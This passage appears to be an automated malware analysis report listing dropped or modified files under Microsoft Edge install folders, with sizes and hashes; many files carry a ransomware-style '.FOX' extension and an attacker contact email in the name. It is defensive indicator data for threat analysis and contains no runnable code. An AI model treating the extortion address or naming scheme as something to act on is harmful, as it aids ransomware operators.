C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Trust Protection Lists\Sigma\LICENSE
Filesize
1KB

MD5
cc6d3bc47ddf65db4eef905c0b7f36af

SHA1
95cb393cd7dc380eaf2df38e4617f0c0221a8933

SHA256
31d443af39fdf75f5442ef876b8f5ae668dae223da09b8a73b56b4e3c3e3f74b

SHA512
808f68afc70a3465f6d19c83e0003956ff33ebe324d4c6d5d92ebf2a1b0487f867b883760165daa1c74fce33a7a740131eef84b9072089952ed2487270f27ef0

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Trust Protection Lists\Sigma\Other
Filesize
1KB

MD5
b68c24cbe699f954f615f31a53f1d926

SHA1
1ba288fe5291130f880cc0e83d53dfe91cf3a3d0

SHA256
1c9746045d3525b0e00e47106828f505b2bf45c63b4ba1c146752819bf7194cf

SHA512
896149a7b25c3d3d3c8300cc5eb810b8f3ecf79238ea096bce230439a6ec2381585b3f8dfb0e776e1414d14ceb77e158127b2def5edd57697a3019b574de5fd0

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Trust Protection Lists\Sigma\Social
Filesize
4KB

MD5
3cac56593d65cecb0a279d328f26941e

SHA1
b57da1dcdba171559eaa8eab7d59b8ae2766a718

SHA256
1495a996837b328dfc7177804bf961642117715af9a0c9c4de3815ef8eed6f08

SHA512
a2a1148508abf807abfcd93986b5dfbb2b66c4d3a390425cde80cfcc062d2a400dc3f1d86133378fc78dc8f08fbf556520cda119cf69c8006695f8bee9f0b1bc

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Trust Protection Lists\Sigma\Staging
Filesize
6KB

MD5
e966060ed666886c0dc212630c574534

SHA1
03c0498d4dd204b6ab2bcd9e3097ebbad06b4b83

SHA256
727829816fb7f7cfcdf1ead16b2d1d79ee59b6394b8df23ef50323d58b540256

SHA512
f8aba8359fca105a700f801532a16e2fcbbbbc6bdb576e08cc7adcfa8d953a1e14f3f2555fe90f3ac268fc63b0374770fea5b38fe40cb88b3c218032b78220cc

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Trust Protection Lists\manifest.json
Filesize
1KB

MD5
ca0526d75a00a98414692df1195943fc

SHA1
b0b7a40d481aecceef0770a50a4648e4f4dd6392

SHA256
9eee1573d8c3650a83e4088f96f80b53bf4d700c23cf8b01ecfa5011aa220d2c

SHA512
778213deda709433fda5485c161eedf5794bf3c7d04924eb32d5b06c7fbdb70217a182ec9d85cd0331985b3a8457d31b70ff70e8231669ac5ba9fde8a80790d7

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\VisualElements\SmallLogoBeta.png
Filesize
16KB

MD5
8f4cbf6510c7ddbae3408f94373d1ca3

SHA1
f189f7c69b78477a9be5410aa380c90b484d2140

SHA256
ade39bd9371b3ee3f969e474b43111b188a2adfc6667734286b4bf21fa166525

SHA512
ec341d711afe85aae26bd746ea959bd14c1012029ad6fe502250d0b24fcdae1f5781cc5a121172ca01b71c70ddf65b58c0a5eb59308c6f81c1e1a4d2dc81d6ae

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\VisualElements\SmallLogoCanary.png
Filesize
15KB

MD5
0ed571f17da66c43bd53b7b3f94f8a53

SHA1
ac012362ed4bb2caa66f3bad8f39ced31a06c76b

SHA256
7588fc89e57789ea1e0d4c209f80e5cdebd8054c4938cb61a71cb12aad75a684

SHA512
639090b446642c51e5d705f14ad0cfc92b1db2f29fd05217863da43174f4a38301065ec7f2a339ba40fc8e7cbd013c9880d100a68251fe4fadcb8e73e917ebf9

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\VisualElements\SmallLogoDev.png
Filesize
15KB

MD5
c9761322be42d7fab01e70aadfa86b89

SHA1
f785b7eed91436c4ba7c77ee7c38ba821623628a

SHA256
dc6282f7594da860950f9672fed9e61b198e0125d57315ca3f78e6e53d50555b

SHA512
60b5edfe265291fa89327c5c362a37db57fb2938110dccf2d7092ef7ee17013ced9e3d7225e660110b58422591ddee0f8ae0630a1ebfa03bdb09196f6e49ed80

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\[PabFox@protonmail.com ].7ePIYF0E-noO9njqq.FOX
Filesize
118KB

MD5
1cae1d6621e28a2e07e79dbc6a759cdc

SHA1
9b1378b48ed781748accab6a33658e4194efaeab

SHA256
4adacc7e5d6d5b48594bdd93238b8c81cab4735d156ccb1d44771c0660004a3c

SHA512
f09bf2e4572342b234efed0f1fe7ccbf01263863b8fd44b69d8e496c2dd46c7d795f53c45f60214b3083218a7a0d64c360ad2a68bf8365580aaf14f77d830656

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\[PabFox@protonmail.com ].JWQjKgiX-lS0hf9Du.FOX
Filesize
671KB

MD5
38ce580d9c8f2275c79b616064343f9f

SHA1
8c37ceee5893e8803d828484cd71afc88d0fc177

SHA256
0c17b517fca2ecee7bf245944a2848090c573cb149d100a63a87cb39a5a23318

SHA512
e0306bc6a544527b4841623290df08853ecaff682e49140fe6c1d74688d40a8577b7f07ec3f1d52cb5418caa711ef7d896cf2b59d8a1930f9389a5d3a9280ead

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\[PabFox@protonmail.com ].dM4UIn23-oDso2Jak.FOX
Filesize
1.2MB

MD5
5daa7a235d9ec5f8a7e1ad0df32a87ae

SHA1
e4b2951d7961bad3a289a39545eca5d9e65037a9

SHA256
b0a0fcaf272bc51526909fbd0891e149d68d8a2d7e738c0d2dfd44e4f95a9b57

SHA512
bbd7f0f045d9c4dc38445b3c317ec00e9bff975796d76780747952e8345f16038bf5ffe95866b023505b026ac8ab7002fdda9845d95cd360fd6a2ea12ee1bf47

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\edge_feedback\camera_mf_trace.wprp
Filesize
25KB

MD5
c600762af35393d87e608048c051d539

SHA1
5fc016145aa59ab4dd6ec8de710ef44a7dda081c

SHA256
6941187e6210ac5ae3c46f52e55dee6c21371748f6883f2cd5042f50e4ae6f26

SHA512
239239735a68fe8fd28a04f234b436cfeccba991af18b2f145b285d5073cfa325f582530c46f53391630b8cb18b27bfa595111e4a6b65fd72bc387ace1c60498

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\edge_feedback\mf_trace.wprp
Filesize
13KB

MD5
1bcd11748aeccb52aa1751ac0ce40a31

SHA1
2ea8a0d25f3451199361ac77631683f060a03c38

SHA256
f14eb4c195ad65668e7701b516d50b22c8d3ffa9492086ee646794483ad4899e

SHA512
d32b7fd999a24dd8c439a7cca73df0fc20cc856ac70d49de522a45949f109244610816e156198b678fc46ff4c0b3eb78911f3ea0a7cf674451d0f1af70cd8498

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\icudtl.dat
Filesize
11.8MB

MD5
a424aba5d079080e8c8284f70e2fbd1c

SHA1
3837a5267833f7b06282e121fd377afcb853cbe9

SHA256
82436863b71fbc62749518ed97565c9ef060a9b3b5a5713046439215e492ec7c

SHA512
4c2ff0288e222bc3d5f0c336dbe7e7991f9b6c9d345a51b7bb659661ddd3fc90fe621f17e48d6dab139917c009ba001f76ca8da0f09e5e2f538dd33bb28bc952

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\identity_proxy\[PabFox@protonmail.com ].PyGlodXU-s1P970Nt.FOX
Filesize
2KB

MD5
eb1123242c40a7cedf4aec790331226d

SHA1
cddd7945bf68d5d004ef34bab2491692c8fc093b

SHA256
19eef28d3498bff7116f6ba84ccf0ee3807bf7cd7943d73056443fd3e9b8ea6b

SHA512
12cba6a0873c3ccf64b10b4dde625b470f848852e9060df3d076127c3e80a2560bab5aaafca28fe08c0cbce833d03ff1a7971319cf1601c0c233f3dc1cbbac11

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\identity_proxy\[PabFox@protonmail.com ].u8INtmVP-ukkh1C73.FOX
Filesize
2KB

MD5
349d58cb51e1f284ebdc17dc8c052cab

SHA1
d9095811ab2e817184943148df8eaa13c2c9ce46

SHA256
9f5cd0db41363ef52dcd7b5a049b2258a4c4c680f3ae2a4c0dd654a6e77e44ce

SHA512
7926c5d6c0fc2d610087760812b04541133246121b361150a71335d12b67b90ca58f3baa01d625e22cd44be333a30a2360e597827d78b23e57154a919ee2c5e2

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\identity_proxy\stable.identity_helper.exe.manifest
Filesize
2KB

MD5
1ebae6e36e0f864d3e8121906cb71b7a

SHA1
0f22aee5d6243a5c4eef60e13e3d3ac498f909cb

SHA256
d47d8d553afee790b1fd2a4275a8b0dbf1a99d250d9c6f52887f288d5ab22edb

SHA512
c976fa36ad37b95bd56161acf9f2fc9dd5a65c50ced222ff3e5d5c46198c8522db1fc07af4b91c5564ae54a67fbb364318931508e9c0a9f60b4ef3a94f4b3e26

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\identity_proxy\win10\identity_helper.Sparse.Beta.msix
Filesize
54KB

MD5
a4077dd282b62bb1b2c8bfe119334ee0

SHA1
21e64cce9c49d40a4c0c133af4f93a54d06be1e1

SHA256
c17318a59b366c3e5ab393731b9f76a2bea450c8f711f0faae4ea7421acb99e4

SHA512
c453b5a7e7926d47ff003d666513f6a0322d68a488ec3e7523fc4bbf8f5cb6e05b2ba4c50f4aabd3639cfe863b6fb859c9c3e198e912efbf17ade2e2fc20bd3f

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\identity_proxy\win11\identity_helper.Sparse.Canary.msix
Filesize
54KB

MD5
55c60211fb0c152fd980f4f0f92af159

SHA1
762dbc3e44202a8f50dc5c98c49814fb3f68f357

SHA256
95acb34668e041a4b1d4c14176ad788c880166dad22c37ee80f08932afefddb6

SHA512
0cfe1d92654963169111ee81575a0d40296a9b894cdd64f29ba7af72e65747a44eb1ddeab744b2abd69ccc3f1a3d1230ea64b12fe212aa839d51cc044804c9b9

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\identity_proxy\win11\identity_helper.Sparse.Stable.msix
Filesize
58KB

MD5
b2a521a2f6b46857a3457e22beb004a2

SHA1
d690eabbeb3c09cd6d39f0d8061b283f719c1d90

SHA256
23e90072bbe063d8f98bd784c7679301cc52537e7466d8ef5ea39f1720d2f2a2

SHA512
c4682a49ef4280721d961e9e609f9e66af28de258a0885a88a3c11f2fabc8df139f2aedb10ba02c7a8e69d7142aa179d1b9bda640662f0eea7f31a3e50979b87

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedge.exe.sig
Filesize
2KB

MD5
811d9e8e3da97b9c344fd0b8ab8e831e

SHA1
97d274b78c846101c03032f2019988b3b86df368

SHA256
5b9a175eca90aa99fa0ac58726db31822204da0fbcf0b46bca39c841cee11082

SHA512
4badd2d5c0795652451b5f178696da183c9f6bed6922eb28d121009a99c48f0f9d53dbdbd48b91b1969b3c5934f8afd36a332eb8ed2b7873789d10af4bd63ae3

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\vk_swiftshader_icd.json
Filesize
1KB

MD5
55a8cd176d8a684bedc82b07e1ac1a81

SHA1
d2445dd1d882242a38712d5bfdfca30ea80a5b04

SHA256
8b65a549e0071a90322a3b0cae7cde7b9d4aa8bab76221c3df9c900058f98eb7

SHA512
708626f959dd2150eb65e3f41aff2fee962f034c339a4ce165d80f99d9f58d86396f7c81864f23483346f4bf40205a932ea306609cf4a5175ab6fc4bc1a1cd5e

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\[PabFox@protonmail.com ].1Vh6qYzN-nIA2slNB.FOX
Filesize
1.1MB

MD5
b7493ebbdc8e395307b773148e2a943c

SHA1
6e521bee91c364d3dc70d974a917eb768eb4fc2b

SHA256
d48bde184625f5eaa1b3c101306d9b570bfa715798cd7df24a3b4a9a2acf7ca1

SHA512
80292aeef9bb2dc2cf3c398e8127f134b54d7ee3af64e8639e52f8188b0644fca8e500e9a3b0a000aa50aee1eac9d2656b7057a67ff6774304404341d12d4be3

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\[PabFox@protonmail.com ].7S5ExIZp-XsHXqvIL.FOX
Filesize
1.2MB

MD5
1a8a61fa8dc952faa551cc54fbc6cf5e

SHA1
118743fdbe5205516b01fd9767797ed1e0ba26aa

SHA256
1051d6dadf5ee642a7f7f1e310f1e125b7f8591416ffd081a68bc4d605706079

SHA512
1cda561a4e0ae8da069d82c667334200d45646eafccd752e8c901bd40826ed6bf3df1ab217836f008b225da1528acbcd38cacb42441e2a725d88d0c312841ca3

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\[PabFox@protonmail.com ].BUFgsvQH-QvoCeMmS.FOX
Filesize
1.1MB

MD5
425db5d2f4e900cc21a181e9db1575cb

SHA1
a34678984dc761c6c6d90d667de4a4fc57cf91e3

SHA256
b4327781d424bce84a42531107aad3e351af50bbc48b64c459b93ed901a05f58

SHA512
b26d9326e5058f935104416b10ad7ebea0563b72ce622a19cb73ef2f791bade02be161c39189e9f481033564a87ec2f199378c811a2847419efbc740f98923e4

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\[PabFox@protonmail.com ].LTYCISwC-O5OM0HF4.FOX
Filesize
1.1MB

MD5
d216b7a2fda88c81f64ac0abe56e0551

SHA1
e001c43fc5b123471c4ed6f1e396d48cb40841e0

SHA256
f62649376d16e6bd94ad75f2a016f89869ada0b5bf5b19affa06a1065396fe92

SHA512
351d8870fdd52e75d70c3372f0e03edcb225b63054f8bbc21bdb13cfc36ccba3578e3c9cf86e67139f68b6f30689714bc7510deb6bbe4b34dc6bd86a83ef0506

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\[PabFox@protonmail.com ].MIYYYKo9-awcx8Pv4.FOX
Filesize
1.5MB

MD5
3ce4bc74562bffe0260b074a76f39866

SHA1
28e050ac2936b11c98d635fc79c9a771eb5e8acf

SHA256
6950caa66376e43765fc7b2b455ab61e3f6957da670aae133cc6f4b3c101c536

SHA512
13199a5dc7608049405af3b154cccf270bb683968841155874cb6ba5f7208b713ca7257ddb517bcafb1b96eaa94d5a1030af6890299113580d586fdebf10f9db

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\[PabFox@protonmail.com ].V7wN0JYh-QXDNSPdd.FOX
Filesize
968KB

MD5
4a8359d725af1396abeb6cbfe7125ed6

SHA1
4c5abe8c99cb61906cbed3eef43e1d01b3993069

SHA256
66d9e1eba8d1486c920951e1b5b62abd0ad86318fb37ef4ee002cb59cda475b9

SHA512
33cb29711c76689eedd4ae4b0aba60097abc54efde942447c09e3816070982f517b8f257485ee8ccb1f4e02c9ac7743450fd7ec91c5684896e3e48a643613c5b

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\[PabFox@protonmail.com ].at2vz640-f7PRDi4g.FOX
Filesize
1.0MB

MD5
385dce6a49b75bce1b607b87b44543c5

SHA1
42fe4b7c5853bf0b840bd084377c5c3045159422

SHA256
efafcb1170da7ed42a61a8049ae4dcab7ef047885e32848605db71909d92ab74

SHA512
25dff303841ac3bea3bf5102f3a56a12988175c16634b3121d8cc4a440c08348b092bea10712ad657be429178ab04ac59468ad498952d6bb1ef42d7c89bae933

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\[PabFox@protonmail.com ].e8P04EgK-YhfFa2Mm.FOX
Filesize
2.0MB

MD5
be43de67c76b10e6fedd08c76b03435d

SHA1
320b20b67ce9b475dc411fbb2d1ab5f62140cc02

SHA256
041de48b75f7dfca212a9c6c17abcfeab82cd12cc2d0bc4ef8e1f83c490fe04d

SHA512
72214f2fc8d04a8a6b85b85015e0553e0d8c8171852d3cdefa01d246714e6604e69d2a8302d8e282a67b71b31af125e9349d7a5b991eba8227550f86584e2cb9

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\[PabFox@protonmail.com ].hwUHWDAW-nvXqEAaO.FOX
Filesize
2.3MB

MD5
326e26cad49035dfdf98960b49be53c7

SHA1
5d868426479d5944396887488a485e44f9e8d814

SHA256
4ee80ae4ce4fd56e0a20aaed3be1f795a80c8cc17e7a0c7de890c7b91ca3a457

SHA512
82d7fc8c43804be09a070ba686a19e76d4b57e66b264ca40d6738af8e48f636371046c1ddfa78721406153ca8a1cfef35ef04c8c6a2fcc050a495d147d90e074

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\[PabFox@protonmail.com ].kA1kIdvL-3JOLeQH7.FOX
Filesize
2.3MB

MD5
f13fdc0ac7e1eed277327859b87383df

SHA1
895bebfae663b59ba3e300c8277b29bd176305a1

SHA256
b467bb8734c8edbb7bbc7bc2f53d009800f4d4ba66651faebdaafe8e4086162a

SHA512
5b5a312e470639058da0dbf8a19f45397989df8e65403d09d9723238e3e61aec96475d577c4fdae96b395d217c2ec3015103f58610e4e533d5c632180d73a991

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\[PabFox@protonmail.com ].yQfaE35m-vWp1YH1U.FOX
Filesize
1.1MB

MD5
2930404a95fc102c88b5f4d9a3729a64

SHA1
53ad9f06f9eae8c2d131cc55fb8910e33d0b62dc

SHA256
aa7907b33aae69fb208671c413fde29ffebbbcf1f19828f1281ec179ffbc9914

SHA512
7ec0ec496334eddf422e45efe18d7e939ee81d004b26342c944e7889a634f8c8c51d13794685433c2121c50773e25fd06253ee16a0db18241bc7bcb38a74625e

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\[PabFox@protonmail.com ].0JeSlQOg-dSryduQ5.FOX
Filesize
1.1MB

MD5
16dc1e258b08ec0f8783f4da4e1a4478

SHA1
bb6a6e0bf8794272e079d2a77dd28f66b763f670

SHA256
da2ca27b4af35bd12552c2bc3de0a42e19505cdbdcc829bf09ca280b21529516

SHA512
8eed4bd7570a5f1a2049ca7c35a5ebf6e1352b24bb357a58f1ea3809a92da5b209be99d891d63954fdc56816f028906a950e91b77c6e5afbf29de3e6b05e243e

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\[PabFox@protonmail.com ].2icL5Pap-x2wEbuPG.FOX
Filesize
1.1MB

MD5
c3da32ba1cc0afd6c66733d5efaf2905

SHA1
4f91df2decdf6d1c46eb025de5281dab095aa9a7

SHA256
d55850d4a470f966ea0602ca9c3c9c522b170d1fa0988dd5b78d4e5f7da664a7

SHA512
2b8841c6ef5a7b0c60c8abb9ae3044709faf2ed7bb2def0c461f3d3460ea4d57130b517a25a5d672ec3425b3f454cb2b52575128f934eb6a1681f062755758d7

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\[PabFox@protonmail.com ].39xcyCHv-k0JbcjbW.FOX
Filesize
1.1MB

MD5
0998a513a8b2e22aacdea0803e1c5786

SHA1
1b70c47b435048bdae96c6a2bc69479d09a49261

SHA256
ae0ce02f05e93cc40442ad120d33d7f889bc905ca7a395d2c1d457126933cd74

SHA512
9155ddf9521df7be4502739256f1f893938a3e43e51a01244b726fe96c5d1553cca5461b1bdab16de84c9362b4f0bf4ac4a7dce15a60babd26aaac7e5945c4bb

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\[PabFox@protonmail.com ].52GBEHYL-CGpEG0uA.FOX
Filesize
1.6MB

MD5
69c55ca601967b45791211380eb71dd8

SHA1
0fcaaf39fea8c990585eac47f48d2c4004315bd9

SHA256
aaceddf34bac5585c98dcfa1ac1073c6298644fe8e57642df7723b846cbc8991

SHA512
f778125d4e55fbac4b70ace531ea330b1eb34cd2b1bc0a1ff37693981d40f0a9ad7eb134483b9d51b79dd2ed4b71e418334da024149c3ccff6530770355b73da

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\[PabFox@protonmail.com ].I0D5Neck-sqyrzD67.FOX
Filesize
2.1MB

MD5
aafd3e7cebe18972edd686c58d639535

SHA1
bc7f0f87223d03bcbe2a7b6f4934ffa716669096

SHA256
a7ca0d3b6788fbc20afef525034fcd0695079f44ab1b59a561f6a4115dce83ab

SHA512
4c86d3a7869f1bf6c4969d940842c0f767f3f5274bebe1abfd20b5cf1ab1f1b83a97eef51f525f0201549fa9b4c8f6754ba8a2cb2c280d3462c007ea157a11dd

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\[PabFox@protonmail.com ].OFp51u7C-p3Z58cua.FOX
Filesize
2.1MB

MD5
e06e5c237cf2aabb58fb5c34b96d38c0

SHA1
4c4269d20a1455fc3f023fd9382c4a7e3d6fc3ca

SHA256
f1e1b2f8714c35ce43fdca3fd85e7c9780e9e6026d8ddb12c8485f1611cf3e71

SHA512
176cd5bf8b50b6649cc492d36b09bcc81c8b6683dfcd363ec3d095bbe9383a5bac1ae716a33df5d64d9d9bc3e9bdc8af4ea810cfdc6fd2350cb1d21a01be9593

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\[PabFox@protonmail.com ].Y4U3214W-IKgYcSgu.FOX
Filesize
1.7MB

MD5
f1251dbfe464d0bf2346d775ebfef6cd

SHA1
82a347077c8faf829952acebaab6c99469c76ebe

SHA256
432cc4eae266dd5000381650011d75f821d7f0c0c3a2e49812591996706c45bd

SHA512
95eb92d2caaa8fc28dabdbd9b1317133f327dd011a1e9e29a66b160be74bc9ed608d761c3df1ddee75a311a554c9d09d3393338b62f88355ece5e05c5fb8645c

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\[PabFox@protonmail.com ].amLRyunL-LiiKZAOD.FOX
Filesize
1.1MB

MD5
7af81c06c0c58e9932b947b7cdecd9ff

SHA1
1767fcc63d3df1cff7bf8586a30fec404901e73b

SHA256
ff0aa94df2bcdf196d8eb83dcff00d56d9339ce7092142e7a6789597a36b1709

SHA512
7183a4d9ae5da860dc8ac2a41e4d14e4587d283052d4c4d8079d16e88e49d7ffcd77bb958d76012df40652e994ce39aa82131518c75fe63792c42470a91e91c1

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\[PabFox@protonmail.com ].b6qFgMxI-T2uiEp8I.FOX
Filesize
2.0MB

MD5
dc5e65c4eb38d47ef037092dc6bd5059

SHA1
418236e011e9dccba38272f093cefda883c96a88

SHA256
3ee89a3df3685572d6c96f60ec7ab29e86f73b76381bb5e7286ae639ca6fc017

SHA512
58a4814fa94228980a0b12aa78afd03ae63ef82fea71333d6c24e7da3c64b97ae4c04af9bf3a897507903f2da3d0d43d2d7d91bf4a434efbf46846da719c4900

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\[PabFox@protonmail.com ].i9Dl9jJL-akMUHi5e.FOX
Filesize
2.1MB

MD5
4750a49cadb9bf6086ce26a8999fad79

SHA1
17d665c8b738395c20d4b869b4de53c993e93fa9

SHA256
0f8b890faaea483fb34d51784cfadd7295164f3c87326d9f60af826d9ca5ed01

SHA512
ffa7c7800ec3971395a6a899e43e7bcee9e1d3fe021526d1cae14d3870248ad109eeb5ad2f8d19bab7a155809d7b81fc1a8d28257cd05046a23137092a08a7e8

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\[PabFox@protonmail.com ].zyitO91I-lND4bfJD.FOX
Filesize
2.5MB

MD5
7ac801f754f2d88c8981011ac8937d5f

SHA1
d63b7c013bc5e0f0cecc7e19bc11fc5ff9679268

SHA256
3d98a4872c43a0cbf828c33921118e93ea91dcfe470e8fd03b95f96759ede20f

SHA512
197c75799f5223cb1a8dc0a780bee864e602c0ae4ae9fc88679f4e8828e66efa2510d0f481ef8757d7ec831b31abbe90d01ae8cc0b0872a93159ae5341e05774

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\ru.pak.DATA
Filesize
1.7MB

MD5
8ff969906c8f0b07ad81f57b2aed68b2

SHA1
5f030d5392a82ad7a018da7fe246deb1cc539b75

SHA256
e02378269e5b2032c21f47850164afa708aaeb7470f5d5ca4c87bd4de58601a5

SHA512
ef928cac57e5e5871454aaaa7c60c333eb91b41fe14fc09de34ddedb988c35e42faebf89f88eb94fcbcf7401d0dbe07581fdf7aedc1937c8860870e53f1fda5b

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Trust Protection Lists\Mu\[PabFox@protonmail.com ].TW1RrJAG-5VBThTQk.FOX
Filesize
69KB

MD5
d22320a01450ba51bf5949b62657b31d

SHA1
d98442e63632cf0f46063bf26cca3d8a93584a76

SHA256
1ecc0a01fd05aa250e8f940329c7c3c8c181c7aa9ca9324261a5b6150ad7bf60

SHA512
1f8f46f207891f0d9c6b6c7b43cf74660da5ea67cb39b97cc480b9a42caf5675b66eae5ef051787a64fc6fdcfbafee881678676dd18b536f8abeb2587612c25f

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Trust Protection Lists\Sigma\[PabFox@protonmail.com ].a28kghLJ-ZmyRyMSY.FOX
Filesize
18KB

MD5
d1391cdfc62f7c7ce37e48d851febbdb

SHA1
5e631c37d81f67769c0077eab1bdbab4c1a197a0

SHA256
0bd46bcebe9c26c05e0a92d8fc0b645530d99822d5c1c1906df684e5c5be5c06

SHA512
9a17ced66bfcab6f4e639f05f7aa7334088c1e811e5c848888ba6a48ab70af800cfc3f7aca49204b8d7e0740a4a289f7c83f4e82bbf905a683073f0caab86b40

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\VisualElements\[PabFox@protonmail.com ].AKSZODgg-VfGmzNBm.FOX
Filesize
30KB

MD5
3a3807dd8e1575e6ce72d818cbcd0212

SHA1
15549a6b3dcfd0348eba917ed19795ff041c5bfe

SHA256
a85f8afc4136d73e8a6a5ab9740584fcd4ae0fc7f50901d75dc13478f25d5a13

SHA512
bb385587ae17ba26e073f22e054b381731011179d5545f5ced829f8cb9cc3281b7fe22c64f6ba31aa398b5f225f6cd626c0c0dc2e0a288d141b914e583d770bc

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Trust Protection Lists\Mu\[PabFox@protonmail.com ].LUlQEplb-tym6YSYT.FOX
Filesize
5KB

MD5
1497c229a95be48ed458adc4cf7d427d

SHA1
656aadcf39eb60fde917e8fad814afb4a38c36ad

SHA256
8c91b4b28998fcddace936eb0c603b0f4d8582d51d8d23aebafd529755ea73f4

SHA512
7e5f8f7efe9eeff4e20e3bc05a19f6a8729e546ff08e71dec855f76862516889eb3bc2de7b215b096f42fe7256e39467282ab5b9667fbd051c6de6fcdbe22166

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Trust Protection Lists\Sigma\[PabFox@protonmail.com ].AlNGO89d-eRD5u4xN.FOX
Filesize
2KB

MD5
c066f70ff487aea3f2698219e354fe0e

SHA1
057450f0d8dac5a35da3f885efeafa0a9f31f688

SHA256
5b3ef244f529db789de2d8ba113e2781c96a4ee3e8fef2382791b2720f6392cc

SHA512
be2a2c6b304db4ebb1c77cd1202ea9f379b15e35509487959b752b92093dbc049cadd148fb800d31a7c7cfb5feaec05f3d252b5ac21d663cc2234f7cf0d6dc26

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\WidevineCdm\[PabFox@protonmail.com ].rW6jMT5Q-xldOEIyC.FOX
Filesize
2KB

MD5
ae2b62b11d6b200463c05f90a9830384

SHA1
40f87cd6bcfe3e10da7c4444e928ca92922d9356

SHA256
2e861222b29b533a2f4ed44d548efea6246f1500dac2cc64f4d36c2ed9750f92

SHA512
645e267f50e6c3a95ab4d977a025ed6eb22f075593c8b597b6ceb72d5eb66cafacdc83de8f8b4872f481e82b5b097dafd6b9d28fa3798db01e2787e8a4b5f2db

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\[PabFox@protonmail.com ].FVH1oSmM-9TzwAqC8.FOX
Filesize
1KB

MD5
bfcf2f57759e4c6341d2f76845aa2af5

SHA1
51579ddf154371a39206aca89126d515854fbfc5

SHA256
3d51a2c5f6660f5bf853b84016c343ac4bd659b0819c00c89f7e923c5414e891

SHA512
ace71f32a33f6a9c1b6559243238894d063467f9a09788bc635946b386b6478a309981890b13e1804d9bd8330f2a1f00e187a7c9ada8f687a1c69b7337fe2f6f

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\[PabFox@protonmail.com ].RUyKCCoY-LT8PKIec.FOX
Filesize
1.4MB

MD5
d591b961d48b018e2c87c6ce7299ba46

SHA1
6d4bc6d926afc95b358d2c5b16d97f170da6baa9

SHA256
203b87ccebb48a33f6b58257d37656b36d80696e270621f2b1ce71ded21fc565

SHA512
